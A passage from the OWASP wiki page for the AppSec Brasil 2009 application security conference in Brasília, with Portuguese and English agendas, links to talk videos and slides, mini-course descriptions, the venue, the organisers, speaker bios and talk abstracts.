| bgcolor="#b9c2dc" align="CENTER" | '''Dinis Cruz<br>''' Apanhado dos Projetos do OWASP<br />
|-<br />
| width="14%" height="32" align="right" | 14:50 - 15:40 <br />
| bgcolor="#eeeeee" align="CENTER" | '''Thomas Schreiber<br>''' As Camadas Lógica e Semântica da Segurança de Aplicações Web<br />
|-<br />
| width="14%" height="17" align="right" | 15:40 - 16:00 <br />
| bgcolor="#d98b66" align="CENTER" | '''Break'''<br />
|-<br />
| width="14%" height="47" align="right" | 16:00 - 16:50 <br />
| bgcolor="#b9c2dc" align="CENTER" | '''Brian Contos<br>''' O Uso de Web Application Firewalls (WAF) e Sistemas de Database Activity Monitoring (DAM) Para Melhorar a Segurança de Código<br />
|-<br />
| width="14%" height="32" align="right" | 16:50 - 17:40 <br />
| bgcolor="#eeeeee" align="CENTER" | '''Matt Tesauro<br>''' ROI: Otimize os Gastos com Segurança<br />
|-<br />
| width="14%" height="47" align="right" | 17:40 - 18:30 <br />
| bgcolor="#b9c2dc" align="CENTER" | '''Pravir Chandra <br>''' O Modelo de Maturidade “Software Assurance Maturity Model (SAMM)”<br />
|-<br />
| width="14%" height="17" align="right" | 18:30 - 18:35 <br />
| bgcolor="#cccccc" align="CENTER" | '''Encerramento do Primeiro Dia'''<br />
|}<br />
</center> <br />
<br> <br />
<br />
<br> '''Programa da Conferência - Dia 2 - 30 de outubro de 2009''' <br />
<center><br />
{| width="80%" class="t"<br />
|-<br />
| width="14%" height="17" align="right" | 08:30 - 09:00 <br />
| bgcolor="#8595c2" align="CENTER" | '''Recepção'''<br />
|-<br />
| width="14%" height="32" align="right" | 09:00 - 10:30 <br />
| bgcolor="#b9c2dc" align="CENTER" | '''Jason Li e Jerry Hoff (Aspect Security) '''<br> Ágil e Seguro - É possível fazer os dois?<br />
|-<br />
| width="14%" height="17" align="right" | 10:30 - 10:50 <br />
| bgcolor="#d98b66" align="CENTER" | '''Intervalo'''<br />
|-<br />
| width="14%" height="47" align="right" | 10:50 - 11:40 <br />
| bgcolor="#eeeeee" align="CENTER" | '''Cassio Goldschmidt'''<br> Praticas e ferramentas fundamentais para o desenvolvimento de software seguro<br />
|-<br />
| width="14%" height="32" align="right" | 11:40 - 12:30 <br />
| bgcolor="#b9c2dc" align="CENTER" | '''Luiz Otávio Duarte'''<br> Abordagem Preventiva para Teste de Segurança em Aplicações Web<br />
|-<br />
| width="14%" height="17" align="right" | 12:30 - 14:00 <br />
| bgcolor="#d98b66" align="CENTER" | '''Almoço'''<br />
|-<br />
| width="14%" height="32" align="right" | 14:00 - 15:10 <br />
| bgcolor="#eeeeee" align="CENTER" | '''Ulisses Castro'''<br>SQL Injection: Amplifying Data Leakeage<br><br />
|-<br />
| width="14%" height="32" align="right" | 15:10 - 16:00 <br />
| bgcolor="#b9c2dc" align="CENTER" | '''Sebastian Cufre'''<br> Técnicas Automáticas para “SQL Ownage”<br />
|-<br />
| width="14%" height="17" align="right" | 16:00 - 16:20 <br />
| bgcolor="#d98b66" align="CENTER" | '''Intervalo'''<br />
|-<br />
| width="14%" height="32" align="right" | 16:20 - 17:10 <br />
| bgcolor="#eeeeee" align="CENTER" | '''Klaubert Herr da Silveira'''<br> ModSecurity: Firewall OpenSource para Aplicações Web (WAF)<br />
|-<br />
| width="14%" height="32" align="right" | 17:10 - 18:00 <br />
| bgcolor="#b9c2dc" align="CENTER" | '''Philippe Sevestre'''<br> Programação Segura utilizando Análise Estática<br />
|-<br />
| width="14%" height="17" align="right" | 18:00 - 18:30 <br />
| bgcolor="#cccccc" align="CENTER" | '''Encerramento'''<br />
|}<br />
</center> <br />
<br> <br />
<br />
==== Arquivos das Apresentações ====<br />
<br />
'''Vídeos completos''' <br />
<br />
dia 1 (29/10): http://vod.camara.gov.br/cgi-bin/playlist.pl?p=auditorio1_2009-10-29-09-18-00-000_36000000&amp;d=1&amp;i=1&amp;v=0 <br />
<br />
dia 2 (30/10): http://vod.camara.gov.br/cgi-bin/playlist.pl?p=auditorio1_2009-10-30-09-00-00-000_36000000&amp;d=1&amp;i=1&amp;v=0 <br />
<br />
<br> '''Apresentações''' <br />
<br />
<br> Abertura <br> Vídeo: http://vod.camara.gov.br/cgi-bin/playlist.pl?p=auditorio1_2009-10-29-09-18-00-000_2730000&amp;d=1&amp;i=1&amp;v=0 <br> Vídeo: http://vimeo.com/7461881<br />
<br />
<br> Dinis Cruz, ''Apresentação do Projeto OWASP'' <br> Vídeo: http://vod.camara.gov.br/cgi-bin/playlist.pl?p=auditorio1_2009-10-29-10-03-00-000_1300000&amp;d=1&amp;i=1&amp;v=0 <br> Vídeo: http://vimeo.com/7482554<br />
<br />
<br> Gary McGraw, ''O Modelo de Maturidade Building Security In'' <br> Transparências: [[Media:Bsimm09.pdf]] <br> Vídeo: http://vod.camara.gov.br/cgi-bin/playlist.pl?p=auditorio1_2009-10-29-10-25-00-000_7070000&amp;d=1&amp;i=1&amp;v=0 <br> Vídeo: http://vimeo.com/7476912<br />
<br />
<br> Dinis Cruz, ''Apanhado dos Projetos do OWASP'' <br> Vídeo: http://vod.camara.gov.br/cgi-bin/playlist.pl?p=auditorio1_2009-10-29-14-08-00-000_2800000&amp;d=1&amp;i=1&amp;v=0<br> Vídeo: http://vimeo.com/7506297<br />
<br />
<br> Brian Contos, ''O Uso de Web Application Firewalls (WAF) e Sistemas de Database Activity Monitoring (DAM) Para Melhorar a Segurança de Código'' <br> Transparências: [[Media:OWASP_Brian_Contos_Making_a_Case_for_Data_Security_to_Network-Centric_Peers_and_Managers_October2009_Final.zip]] <br> Vídeo: http://vod.camara.gov.br/cgi-bin/playlist.pl?p=auditorio1_2009-10-29-14-56-00-000_3300000&amp;d=1&amp;i=1&amp;v=0<br>Vídeo: http://vimeo.com/7505808<br />
<br />
<br> Dinis Cruz, ''O Projeto O2'' <br> Vídeo: http://vod.camara.gov.br/cgi-bin/playlist.pl?p=auditorio1_2009-10-29-16-05-00-000_3300000&amp;d=1&amp;i=1&amp;v=0 <br>Vide: http://vimeo.com/7506929<br />
<br />
<br> Matt Tesauro, ''ROI: Otimize os Gastos com Segurança'' <br> Transparências: [[Media:AppSec_Brazil_OWASP_ROI-mtesauro.pdf]] <br> <br />
<br />
Vídeo: http://vod.camara.gov.br/cgi-bin/playlist.pl?p=auditorio1_2009-10-29-17-03-00-000_2700000&amp;amp;d=1&amp;amp;i=1&amp;amp;v=0 <br> Vídeo: http://vimeo.com/7461624 <br />
<br />
<br> Pravir Chandra, ''O Modelo de Maturidade “Software Assurance Maturity Model (SAMM)'' <br> Transparências: http://www.opensamm.org/downloads/OpenSAMM-1.0.ppt <br> <br />
<br />
Vídeo: http://vod.camara.gov.br/cgi-bin/playlist.pl?p=auditorio1_2009-10-29-17-48-00-000_2750000&amp;amp;d=1&amp;amp;i=1&amp;amp;v=0 <br> Vídeo: http://vimeo.com/7461495 <br />
<br />
<br> Jerry Hoff, ''Ágil e Seguro - É possível fazer os dois?'' <br> Transparências: [[Media:Jerry.Hoff.brazil_presentation.pdf]] <br> <br />
<br />
Vídeo: http://vod.camara.gov.br/cgi-bin/playlist.pl?p=auditorio1_2009-10-30-09-21-00-000_2620000&amp;amp;d=1&amp;amp;i=1&amp;amp;v=0 <br> Vídeo: http://vimeo.com/7461340 <br />
<br />
<br> Cassio Goldschmidt, ''Práticas e ferramentas fundamentais para o desenvolvimento de software seguro'' <br> Transparências: [[Media:Praticas_e_ferramentas_fundamentais_para_o_desenvolvimento_de_software_seguro_-_AppSec_Brasil.pptx]] <br> <br />
<br />
Vídeo: http://vod.camara.gov.br/cgi-bin/playlist.pl?p=auditorio1_2009-10-30-10-35-00-000_3500000&amp;amp;d=1&amp;amp;i=1&amp;amp;v=0 <br> Vídeo: http://vimeo.com/7461207 <br />
<br />
<br> Luiz Otávio Duarte, ''Abordagem Preventiva para Teste de Segurança em Aplicações Web'' <br> Transparências: [[Media:AprOwasp_LOD_FER_WAL_NewVersion.pdf]] <br> <br />
<br />
Vídeo: http://vod.camara.gov.br/cgi-bin/playlist.pl?p=auditorio1_2009-10-30-11-34-00-000_3650000&amp;amp;d=1&amp;amp;i=1&amp;amp;v=0 <br> Vídeo: http://vimeo.com/7460959 <br />
<br />
<br> Ulisses Castro, ''SQL Injection: Amplificação de Data Leakage'' <br> <br />
<br />
Vídeo: http://vod.camara.gov.br/cgi-bin/playlist.pl?p=auditorio1_2009-10-30-14-02-00-000_2300000&amp;amp;d=1&amp;amp;i=1&amp;amp;v=0 <br> Vídeo: http://vimeo.com/7460521 <br />
<br />
<br> Gary McGraw, ''Exploiting Online Games'' <br> Transparências: [[Media:EOG09.pdf]] <br> Vídeo: http://vod.camara.gov.br/cgi-bin/playlist.pl?p=auditorio1_2009-10-30-14-41-00-000_3000000&amp;d=1&amp;i=1&amp;v=0<br>Vídeo: http://vimeo.com/7507515<br />
<br />
<br> Sebastián Cufre, ''Técnicas Automáticas para “SQL Ownage”'' <br> Transparências: [[Media:OWASP_Brasil_2009_-_Automated_SQL_Ownage_Techniques.pptx]] <br> <br />
<br />
Vídeo: http://vod.camara.gov.br/cgi-bin/playlist.pl?p=auditorio1_2009-10-30-15-35-00-000_2450000&amp;amp;d=1&amp;amp;i=1&amp;amp;v=0 <br> Vídeo: http://vimeo.com/7462181 <br />
<br />
<br> Anúncio do AppSec Brasil 2010 <br> <br />
<br />
Vídeo: http://vod.camara.gov.br/cgi-bin/playlist.pl?p=auditorio1_2009-10-30-16-16-00-000_120000&amp;amp;d=1&amp;amp;i=1&amp;amp;v=0 <br> Vídeo: http://vimeo.com/7461914 <br />
<br />
<br> Klaubert Herr da Silveira, ''ModSecurity: Firewall OpenSource para Aplicações Web'' <br> Transparências: [[Media:OWASP_BSB_ModSecurity_Klaubert-Herr.ppt]] <br> <br />
<br />
Vídeo: http://vod.camara.gov.br/cgi-bin/playlist.pl?p=auditorio1_2009-10-30-16-30-00-000_3520000&amp;amp;d=1&amp;amp;i=1&amp;amp;v=0 <br> Vídeo: http://vimeo.com/7462060 <br />
<br />
<br> Philippe Sevestre, ''Programação Segura utilizando Análise Estática'' <br> Transparências: [[Media:AppSec_Brasil_2009-SecureProgrammingWithStaticAnalysis.pdf]] <br> <br />
<br />
Vídeo: http://vod.camara.gov.br/cgi-bin/playlist.pl?p=auditorio1_2009-10-30-17-42-00-000_2850000&amp;amp;d=1&amp;amp;i=1&amp;amp;v=0 <br> Vídeo: http://vimeo.com/7461756 <br />
<br />
<br> <br />
<br />
==== Mini-Cursos ====<br />
<br />
'''Gestão de Riscos de Segurança Aplicada a Web Services''' <br />
<br />
''José Eduardo Malta de Sá Brandão'', IPEA <br />
<br />
Transparências: [[Media:Owasp2009_brandao.ppt]] <br />
<br />
O objetivo deste minicurso é apresentar a disciplina de gestão de riscos de segurança associada a web Services. O enfoque do curso visa elucidar aspectos conceituais e sistemáticos nestas metodologias, exemplificado em um estudo de caso que visa reforçar a utilidade e necessidade do uso destas metodologias para o entendimento e o desenvolvimento de web services. O curso deverá fornecer aos alunos base para desenvolverem seus próprios projetos de gestão de riscos. As apresentações deverão discorres sobre conceitos, descrição de modelos e na comparação dos principais padrões relacionados à gestão de riscos na segurança. <br />
<br />
<br> '''Segurança
Web:
Técnicas
para
Programação
Segura
de
Aplicações''' <br />
<br />
''André Ricardo Abed Grégio e Vitor Monte Afonso'', CTI/MCT, ''Paulo Licio de Geus'', IC/UNICAMP <br />
<br />
Transparências: [[Media:AppSecBR2009_VAfonso_AGregio_PGeus.pdf]] <br />
<br />
O treinamento visa apresentar os princípios e técnicas de programação segura, principalmente programação de aplicações Web, abordando conceitos fundamentais da área, detalhando as vulnerabilidades possíveis de serem exploradas e com foco nos métodos de mitigação destas falhas. São abordados exemplos práticos de como corrigir vulnerabilidades baseadas no OWASP top 10 em diferentes linguagens de programação, com trechos de código vulnerável de aplicações Web retirados de revisões de código realizadas pelos autores. São apresentadas também algumas ferramentas para detecção de ataques e testes de vulnerabilidades em aplicações Web. <br />
<br />
<br> '''Segurança&nbsp;Computacional&nbsp;no&nbsp;Desenvolvimento&nbsp;de&nbsp;Web&nbsp;Services''' <br />
<br />
''Júlio Cesar Estrella et al'', ICMC/USP <br />
<br />
Transparências: [[Media:AppSec_Brasil_2009_Web_Services_Security.pdf]]<br />
<br />
Este minicurso apresenta o desenvolvimento de aplicações distribuídas utilizando o conceito de SOA levando em consideração os aspectos de segurança computacional. Para o desenvolvimento das aplicações clientes e servidoras serão considerados o uso da engine Apache Axis2. São abordados os componentes básicos do Axis2, os tipos e modelos de invocação de Web Services bem como suas principais características. Dois padrões de segurança para a construção de Web Services são abordadas no contexto da engine Apache Axis2: WS-Security e SAML. A metodologia utilizada para este minicurso envolve a utilização de tópicos expositivos e de exercícios práticos, abordando os conceitos fundamentais da engine Axis2, e a construção de aplicações reais com foco em segurança. <br />
<br />
<br> '''Tecnologias de Segurança em Web Services''' <br />
<br />
''Eduardo Takeo Ueda e Wilson Vicente Ruggiero'', Poli/USP <br />
<br />
<br> Devido a sua característica de integração e por fazer uso de padrões abertos, os web services se tornaram uma área de grande interesse para acadêmicos e a indústria nos últimos anos. Inicialmente, pretendemos introduzir aos participantes os conceitos básicos da arquitetura orientada a serviços, com o intuito do treinamento ser auto-suficiente. Posteriormente serão apresentados os principais padrões e especificações de segurança que estão sendo desenvolvidos e devem ser adotados em web services. Por fim, o treinamento culmina com a exposição e caracterização de desafios atuais em segurança de web services. <br />
<br />
<br> '''Hands on Web Application Testing using the OWASP Testing Guide.''' <br />
<br />
''Matt Tesauro'', OWASP <br />
<br />
Transparências: [[Media:Matt.tesauro.hands.on.zip]] <br />
<br />
O treinamento irá cobrir as áreas críticas do teste de aplicações Web utilizando o Guia de Testes (Testing Guide) da OWASP v3, como framework de testes de aplicação, e o OWASP Live CD, com as ferramentas para realizar os testes. Uma versão customizada do OWASP Live CD irá ser criada para o treinamento. Ela irá incluir um ambiente controlado de testes oferecendo aplicações vulneráveis de forma que tanto as ferramentas e as aplicações para testar as ferramentas serão incluídas. <br />
<br />
<br> <br />
<br />
==== Local ====<br />
<br />
'''Local das plenárias''' <br />
<br />
[[Image:CongressoNacional.jpg|The Palácio do Congresso building]] <br />
<br />
O evento será na Câmara dos Deputados em Brasília, DF, Brasil no endereço: Auditório Nereu Ramos, Câmara dos Deputados - Anexo II, Praça dos Três Poderes. <br />
<br />
Veja a localização no [http://maps.google.com/maps?f=q&source=s_q&hl=pt-BR&geocode=&q=anexo+II,+camara+dos+deputados,+brasilia&sll=37.0625,-95.677068&sspn=43.934478,79.101563&ie=UTF8&t=h&ll=-15.800058,-47.865822&spn=0.01309,0.019312&z=16 Google Maps] <br />
<br />
''Como chegar ao local da Conferência'' <br />
<br />
A definir <br />
<br />
<br> '''Local dos Mini-cursos''' <br />
<br />
Os mini-cursos ocorrerão no Centro de Formação, Treinamento e Aperfeiçoamento da Câmara dos Deputados, localizado na via N3, Projeção L, Setor de Garagens Ministeriais Norte, Complexo Avançado da Câmara dos Deputados, Bloco B. Veja a localização no [http://maps.google.com.br/maps/ms?ie=UTF8&hl=pt-BR&msa=0&ll=-15.793895,-47.864009&spn=0.005017,0.006866&t=h&z=17&msid=106468407154665154285.0004577c477849eda80f3 mapa]. <br />
<br />
''Como chegar ao local dos Mini-cursos'' <br />
<br />
Estamos verificando a possibilidade de haver transporte de algum ponto da Esplanada dos Ministérios até o local dos mini-cursos. Assim que tivermos mais informações, divulgaremos nesta página. <br />
<br />
Para ir de táxi, mostre o mapa acima para o motorista. É pouco provável que o motorista consiga chegar apenas com o endereço do local. <br />
<br />
Não aconselhamos ir de carro, pois há séria dificuldade em encontrar vagas para estacionar na região do Congresso e Ministérios. <br />
<br />
<br> <br />
<br />
==== Organização ====<br />
<br />
'''Comitês''' <br />
<br />
OWASP Conferences Chair: Dave Wichers - Aspect Security - dave.wichers 'at' owasp.org <br />
<br />
2009 AppSec Brasil - Comitê de Programa (appsec.brasil@camara.gov.br): <br />
<br />
*Coordenador Geral: Lucas C. Ferreira (lucas.ferreira at owasp.org) <br />
*Coordenador de Tutoriais: Eduardo V. C. Neves (eduardo.neves at owasp.org) <br />
*Coordenador do Programa: Wagner Elias (wagner.elias at owasp.org)<br />
<br />
Equipe Organizadora <br />
<br />
*Cassio Goldschmidt (cassio 'at' owasp.org) <br />
*Kuai Hinojosa (kuai.hinojosa 'at' owasp.org) <br />
*Leonardo Cavallari - (leo.cavallari 'at' owasp.org) <br />
*Thiago Lechuga (thiagoalz 'at' gmail.com) <br />
*Dinis Cruz (dinis.cruz 'at' owasp.org)<br />
<br />
==== Links ====<br />
<br />
Página do evento no LinkedIn: http://events.linkedin.com/OWASP-AppSec-Brasil/pub/65160 <br />
<br />
<br> __NOTOC__ <headertabs /> <br />
<br />
[[Category:OWASP_AppSec_Conference]]</div>
Ulisses Castro
https://wiki.owasp.org/index.php?title=AppSec_Brasil_2009&diff=72854
AppSec Brasil 2009
2009-11-09T13:31:28Z
<p>Ulisses Castro: Ulisses Castro, Agenda and Abstracts fix</p>
<hr />
<div>__NOTOC__<br />
<br />
'''Para a versão em português, veja em [[AppSec Brasil 2009 (pt-br)]]'''<br />
<br />
= International Conference on Application Security =<br />
<br />
[http://www.ticontrole.gov.br TI-Controle] and the Computing Centre of the [http://www.camara.gov.br Deputy Chamber] present the '''First International Conference on Application Security''' that will happen in [http://en.wikipedia.org/wiki/Brasília Brasilia, Capital of Brazil] with the support of OWASP [[Brazilian]] Chapter. The Conference consists of two days of training sessions, followed by a two-day conference on a single track. [[Image:Brasilia Panorama.jpg]] <br />
<br />
== Conference Dates ==<br />
<br />
The conference will happen from October 27th, 2009 to October 30th, 2009. The first two days will be tutorial days (see below). Plenary sessions will be held on October 29th and 30th. <br />
<br />
== Conference's Slides and Videos ==<br />
<br />
The Presentations' slides and videos are available under the [http://www.owasp.org/index.php/AppSec_Brasil_2009#tab=Presentation_Abstracts Presentation Abstracts tab]. <br />
<br />
The Training Sessions' slides are available under the [http://www.owasp.org/index.php/AppSec_Brasil_2009#tab=Training_Sessions Training Sessions tab] <br />
<br />
<br> <br />
<br />
==== Sponsorship ====<br />
<br />
This conference is promoted by [http://www.ticontrole.gov.br TI-Controle] Community and organized by Computing Centre of [http://www.camara.gov.br/ Brazilian Deputy Chamber]. <br />
<br />
The conference is supported by OWASP [[Brazilian|Brazilian Chapter]], as content provider (talks selection, trainings and schedule grid). <br />
<br />
The conference is supported by the [http://www.unb.br University of Brasilia] (UnB) [[Image:Unb.gif|60px]] <br />
<br />
The conference is sponsored by [http://www.conviso.com.br Conviso IT Security] [[Image:CorVersao BR Small.jpg|100px]] and [http://www.leadcomm.com.br LeadComm] [[Image:LeadComm Logo Screen.jpg|100px]] <br />
<br />
<br> <br />
<br />
==== Keynotes ====<br />
<br />
[[Image:GaryMcGraw.JPG|left|60px]] '''Gary McGraw''' <br />
<br />
CTO, [http://www.cigital.com Cigital] <br />
<br />
''Title:'' '''The Building Security In Maturity Model (BSIMM)''' <br />
<br />
''Bio:'' Gary McGraw is the CTO of Cigital, Inc., a software security and quality consulting firm with headquarters in the Washington, D.C. area. He is a globally recognized authority on software security and the author of eight best selling books on this topic. His titles include Java Security, Building Secure Software, Exploiting Software, Software Security, and Exploiting Online Games; and he is editor of the Addison-Wesley Software Security series. Dr. McGraw has also written over 100 peer-reviewed scientific publications, authors a monthly security column for informIT, and is frequently quoted in the press. Besides serving as a strategic counselor for top business and IT executives, Gary is on the Advisory Boards of Fortify Software and Raven White. His dual PhD is in Cognitive Science and Computer Science from Indiana University where he serves on the Dean's Advisory Council for the School of Informatics. Gary served on the IEEE Computer Society Board of Governors, produces the monthly Silver Bullet Security Podcast for IEEE Security &amp; Privacy magazine (syndicated by informIT), and produces the Reality Check Security Podcast for CSO Online. <br />
<br />
<br> <br />
<br />
'''Jason Li''' <br />
<br />
[http://www.aspectsecurity.com Aspect Security] <br />
<br />
''Title:'' '''Agile and Secure: Can We Do Both?''' <br />
<br />
Co-author: '''Jerry Hoff''', Aspect Security <br />
<br />
''Bio:'' Jason Li is a Senior Application Security Engineer at Aspect Security. Jason has led security architecture reviews, application security code reviews, penetration tests and provided web application security training services for a variety of commercial, financial, and government customers. He is also actively involved in the Open Web Application Security Project (OWASP), serving on the OWASP Global Projects Committee and as a co-author of the OWASP AntiSamy Project (Java version). Jason earned his Post-Master's degree in Computer Science with a concentration in Information Assurance from Johns Hopkins University. He earned his Master's degree in Computer Science from Cornell University, where he also earned his Bachelor's degree, double majoring in Computer Science and Operations Research. <br />
<br />
Jerry Hoff is a Senior Application Security Engineer at Aspect Security. Jerry has led and performed numerous application security code reviews for clients across multiple industries. Jerry also provides training services for clients, and has over 10 years teaching and development experience. Jerry is also involved in the Open Web Application Security Project (OWASP) and was the lead developer of AntiSamy.net project. He has a master's degree in Computer Science from Washington University in St. Louis. <br />
<br />
<br> <br />
<br />
'''Dinis Cruz''' <br />
<br />
OWASP Board <br />
<br />
''Title:'' '''To be defined''' <br />
<br />
''Bio:'' Coming Soon. <br />
<br />
<br> <br />
<br />
'''Kuai Hinojosa''' <br />
<br />
OWASP <br />
<br />
''Title:'' '''Deploying Secure Web Applications with OWASP Resources''' <br />
<br />
''Bio:'' Kuai Hinojosa has been developing and securing web applications for about 12 years. He previously worked in the banking industry as a database security administrator for the 5th largest bank in the U.S. where he worked in a small team developing applications that protected company's assets. He now works for New York University as a Web Applications Specialist where he continues to use web application development and application security experience to protect university resources. In his spare time Kuai volunteers his time preaching the application security gospel and leading the Minneapolis OWASP chapter. Kuai is a member of the OWASP (Open Web Application Security Project) Global Education Committee. <br />
<br />
==== Agenda ====<br />
<br />
'''Conference Program - Day 1 - October 29th 2009 ''' <br />
<center><br />
{| width="80%" class="t"<br />
|-<br />
| height="17" width="14%" align="right" | 08:30 - 09:00 <br />
| bgcolor="#8595c2" align="CENTER" | '''Reception Desk Open'''<br />
|-<br />
| height="17" width="14%" align="right" | 09:00 - 10:00 <br />
| bgcolor="#eeeeee" align="CENTER" | '''Opening Ceremony'''<br />
|-<br />
| height="49" width="14%" align="right" | 10:00 - 10:30 <br />
| bgcolor="#b9c2dc" align="CENTER" | '''Dinis Cruz<br>''' What is OWASP?<br />
|-<br />
| height="32" width="14%" align="right" | 10:30 - 12:30 <br />
| bgcolor="#eeeeee" align="CENTER" | '''Gary McGraw (Cigital)<br>''' The Building Security In Maturity Model (BSIMM)<br />
|-<br />
| height="17" width="14%" align="right" | 12:30 - 14:00 <br />
| bgcolor="#d98b66" align="CENTER" | '''Lunch Break'''<br />
|-<br />
| height="47" width="14%" align="right" | 14:00 - 14:50 <br />
| bgcolor="#b9c2dc" align="CENTER" | '''Dinis Cruz<br>''' OWASP Project Tour<br />
|-<br />
| height="32" width="14%" align="right" | 14:50 - 15:40 <br />
| bgcolor="#eeeeee" align="CENTER" | '''Thomas Schreiber<br>''' The Logic and Semantic Layer of Web Application Security<br />
|-<br />
| height="17" width="14%" align="right" | 15:40 - 16:00 <br />
| bgcolor="#d98b66" align="CENTER" | '''Break'''<br />
|-<br />
| height="47" width="14%" align="right" | 16:00 - 16:50 <br />
| bgcolor="#b9c2dc" align="CENTER" | '''Brian Contos<br>''' Making a Case for Data Security to Network-Centric Peers and Managers and Leveraging Web Application Firewalls (WAF) and Database Activity Monitoring (DAM) to Augment Secure Coding &amp; Review Practices<br />
|-<br />
| height="32" width="14%" align="right" | 16:50 - 17:40 <br />
| bgcolor="#eeeeee" align="CENTER" | '''Matt Tesauro<br>''' OWASP ROI: Optimize Security Spending using OWASP<br />
|-<br />
| height="47" width="14%" align="right" | 17:40 - 18300 <br />
| bgcolor="#b9c2dc" align="CENTER" | '''Pravir Chandra <br>''' Software Assurance Maturity Model (SAMM)<br />
|-<br />
| height="17" width="14%" align="right" | 18:30 - 18:35 <br />
| bgcolor="#cccccc" align="CENTER" | '''End of the First Day Program'''<br />
|}<br />
</center> <br />
<br> <br />
<br />
<br> '''Conference Program - Day 2 - October 30th 2009''' <br />
<center><br />
{| width="80%" class="t"<br />
|-<br />
| height="17" width="14%" align="right" | 08:30 - 09:00 <br />
| bgcolor="#8595c2" align="CENTER" | '''Reception Desk Open'''<br />
|-<br />
| height="32" width="14%" align="right" | 09:00 - 10:30 <br />
| bgcolor="#b9c2dc" align="CENTER" | '''Jason Li e Jerry Hoff (Aspect Security) '''<br> Agile and Secure - Can we do both?<br />
|-<br />
| height="17" width="14%" align="right" | 10:30 - 10:50 <br />
| bgcolor="#d98b66" align="CENTER" | '''Break'''<br />
|-<br />
| height="47" width="14%" align="right" | 10:30 - 11:40 <br />
| bgcolor="#eeeeee" align="CENTER" | '''Cassio Goldschmidt'''<br> Praticas e ferramentas fundamentais para o desenvolvimento de software seguro <br> (''Tools and Practices for Secure Software Development'')<br />
|-<br />
| height="32" width="14%" align="right" | 11:40 - 12:30 <br />
| bgcolor="#b9c2dc" align="CENTER" | '''Luiz Otávio Duarte'''<br> Abordagem Preventiva para Teste de Segurança em Aplicações Web <br> (''Preventive Approach for Web Application Security Testing'')<br />
|-<br />
| height="17" width="14%" align="right" | 12:30 - 14:00 <br />
| bgcolor="#d98b66" align="CENTER" | '''Lunch Break'''<br />
|-<br />
| height="32" width="14%" align="right" | 14:00 - 15:10 <br />
| bgcolor="#eeeeee" align="CENTER" | '''Ulisses Castro'''<br>SQL Injection: Amplifying Data Leakeage<br><br />
|-<br />
| height="32" width="14%" align="right" | 15:10 - 16:00 <br />
| bgcolor="#b9c2dc" align="CENTER" | '''Sebastian Cufre'''<br> Automated SQL Ownage Techniques<br />
|-<br />
| height="17" width="14%" align="right" | 16:00 - 16:20 <br />
| bgcolor="#d98b66" align="CENTER" | '''Break'''<br />
|-<br />
| height="32" width="14%" align="right" | 16:20 - 17:10 <br />
| bgcolor="#eeeeee" align="CENTER" | '''Klaubert Herr da Silveira'''<br> ModSecurity: Firewall OpenSource para Aplicações Web (WAF) <br> (''ModSecurity, Open Source Web Application Firewall'')<br />
|-<br />
| height="32" width="14%" align="right" | 17:10 - 18:00 <br />
| bgcolor="#b9c2dc" align="CENTER" | '''Philippe Sevestre'''<br> Programação Segura utilizando Análise Estática <br> (''Secure Programming with Static Analysis'')<br />
|-<br />
| height="17" width="14%" align="right" | 18:00 - 18:30 <br />
| bgcolor="#cccccc" align="CENTER" | '''End of the Conference'''<br />
|}<br />
</center> <br />
<br> <br />
<br />
==== Presentation Abstracts ====<br />
<br />
'''The Building Security In Maturity Model (BSIMM)''' <br />
<br />
''Gary McGraw'', Cigital <br />
<br />
As a discipline, software security has made great progress over the last decade. There are now at least 34 large scale software security initiatives underway in enterprises including global financial services firms, independent software vendors, defense organizations, and other verticals. In 2008, Brian Chess, Sammy Migues and I interviewed the executives running nine initiatives using the twelve practices of the Software Security Framework as our guide. Those companies among the nine who graciously agreed to be identified include: Adobe, The Depository Trust and Clearing Corporation (DTCC), EMC, Google, Microsoft, QUALCOMM, and Wells Fargo. The resulting data, drawn from real programs at different levels of maturity was used to guide the construction of the Building Security In Maturity Model (BSIMM). This talk will describe the observation-based maturity model, drawing examples from many real software security programs. A maturity model is appropriate because improving software security almost always means changing the way an organization works ---people, process, and automation are all required. While not all organizations need to achieve the same security goals, all successful large scale software security initiatives share common ideas and approaches. Whether you rely on the Cigital Touchpoints, Microsoft's SDL, or OWASP CLASP, there is much to learn from practical experience. Use the BSIMM as a yardstick to determine where you stand and what kind of software security plan will work best for you. <br />
<br />
[http://www.owasp.org/images/b/bd/Bsimm09.pdf Slides]<br> [http://vimeo.com/7476912 Video] <br />
<br />
<br> '''Agile and Secure: Can We Do Both?''' <br />
<br />
''Jason Li and Jerry Hoff'', Aspect Security <br />
<br />
Agile is taking the software development world by storm, but security has been slow to adapt. What can we learn from the Agile movement? Is it possible to achieve security and remain Agile? Jason and Jerry will share Aspect Security's experiences working with Agile teams to gain assurance and save money. They'll compare and contrast traditional waterfall and agile processes and show how we can achieve assurance and security while remaining true to Agile principles. <br />
<br />
[http://www.owasp.org/images/d/d4/Jerry.Hoff.brazil_presentation.pdf Slides]<br> [http://vimeo.com/7461340 Video] <br />
<br />
<br> '''Deploying Secure Web Applications with OWASP Resources''' <br />
<br />
''Kuai Hinojosa'', NY University and OWASP <br />
<br />
Universities are key to making application security visible and the need to educate software developers about application security as an aspect of proper software development has never been more important. In this presentation I will share how OWASP resources can be used by universities to develop, test and deploy secure web applications. I will discuss challenges that Universities currently face integrating a pplication security best practices, describe how OWASP tools and resources are currently used at New York University to test for most common web application flaws. I will introduce projects such as the OWASP Enterprise Security API which can be used to mitigate most common flaws in web applications and share initiatives the OWASP Global Education Committee is currently working on. If you are interested in securing web applications, and supporting the OWASP Global Education Committee efforts you don't want to miss this! <br />
<br />
<br> '''What is OWASP''' <br />
<br />
''Dinis Cruz'', OWASP <br />
<br />
TBD. <br />
<br />
[http://vimeo.com/7482554 Video] <br />
<br />
<br> '''OWASP Project Tour''' <br />
<br />
''Dinis Cruz'', OWASP <br />
<br />
TBD. <br />
<br />
<br> '''The Logic and Semantic Layer of Web Application Security''' <br />
<br />
''Thomas Schreiber'', SecureNet <br />
<br />
Testing Web Application Security mostly focusses on technical weaknesses only. But there is a huge field of potential weaknesses above the server layer and beyond the implementational aspects. Even if a web application is totally free from security bugs in code and system, it may still be vulnerable to dangerous threats. It is the kind how the business logic is mapped onto software, that gives an attacker a starting point for his bad intents. The presentation shows, illustrated with various real examples, how a clever hacker may reveal sensitive data - including credit card data -, enter into user accounts or conduct a denial-of-service on the whole infrastructure - not only the server - by attacking the logical and semantical layers. The presentation also gives hints on how to avoid these pitfalls. <br />
<br />
